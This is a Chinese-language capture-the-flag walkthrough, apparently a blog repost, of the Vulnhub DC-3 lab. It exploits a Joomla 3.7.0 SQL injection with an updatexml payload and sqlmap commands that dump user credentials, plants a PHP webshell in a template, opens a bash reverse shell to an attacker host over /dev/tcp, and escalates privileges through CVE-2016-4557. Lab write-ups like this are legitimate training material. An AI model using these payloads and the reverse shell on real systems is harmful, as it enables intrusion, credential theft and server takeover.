其他分享
首页 > 其他分享> > Vulnhub 靶场——DC3

Vulnhub 靶场——DC3

作者:互联网

一、环境简介

靶机:192.168.56.105
攻击机:kali win10
靶机下载地址:下载地址

二、开始复现

1.信息收集

arp-scan -l 收集到同网段的靶机IP 192.168.56.105

使用namp进行扫描
nmap -A -p 1-65535 192.168.56.105

发现80端口下有Joomla CMS,Joomla!是一套全球知名的内容管理系统,我们去访问一下查看一下。

我们这里用御剑扫描出他的后台管理地址
http://192.168.56.105/administrator/

暂时没有啥,我们继续看,在kali有个自带的joomla扫描程序 joomscan,可以看到详细版本与后台。版本是3.7.0

2.通过SQL注入漏洞进入获取用户名密码

这个版本是存在sql注入漏洞的(CVE-2017-8917)Joomla 3.7.0 QL注入漏洞

http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

说明是存在这个漏洞的,那么我们直接上salmap,我把语句放在下边,直接放结果图
 python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  数据库
 python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables 数据表
python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__ users" --columns  字段
 python3 sqlmap.py -u "http://192.168.56.105/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__ users" -C "username,password" --dump 数据

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
由于得出来的密码是向上面这样加密的,我们可以使用John去解密这个密码。密码为snoopy

3.进入后台getshell






在这里我们就可以写入我们的PHP了

保存之后,那么问题来了,我们如何知道我们木马的路径呢,我们百度可以看到,images的图片在这个路径,images和html是同一级目录。

所以木马在这,http://192.168.56.105/templates/beez3/html/。

我们成功连接。

4.提权

我们打开蚁剑的虚拟终端,将shell反弹到我们的kali上。

bash -c 'exec bash -i &>/dev/tcp/192.168.56.101/9999 <&1'

但是我们可以看到,我们的权限目前还是比较低的。

我们上传一个linux提权辅助工具,linux-exploit-suggester,下载地址https://github.com/mzet-/linux-exploit-suggester

chmod给他权限之后,然后去运行他。

我们可以看到脚本给了我们很多信息,我们使用CVE-2016-4557来进行提权。

因为他直接给了我们网址,我们直接下载下来,直接上传上去。

先将文件解压

进入文件夹后里面有一个exp文件,我们进行再度解压,进行执行文件。

我们可以看到提权成功,至于为什么要这么执行文件,我们可以去kali去看

flag直接到手

三、知识总结

1.在进行提权是,要学会提权工具的使用,大大的提高了我们的成功率和效率。
2.在使用工具前,要学会查看使用文档。

标签:fullordering,--,fields,list,192.168,56.105,Vulnhub,靶场,DC3
来源: https://www.cnblogs.com/CHOSEN1-Z13/p/16133263.html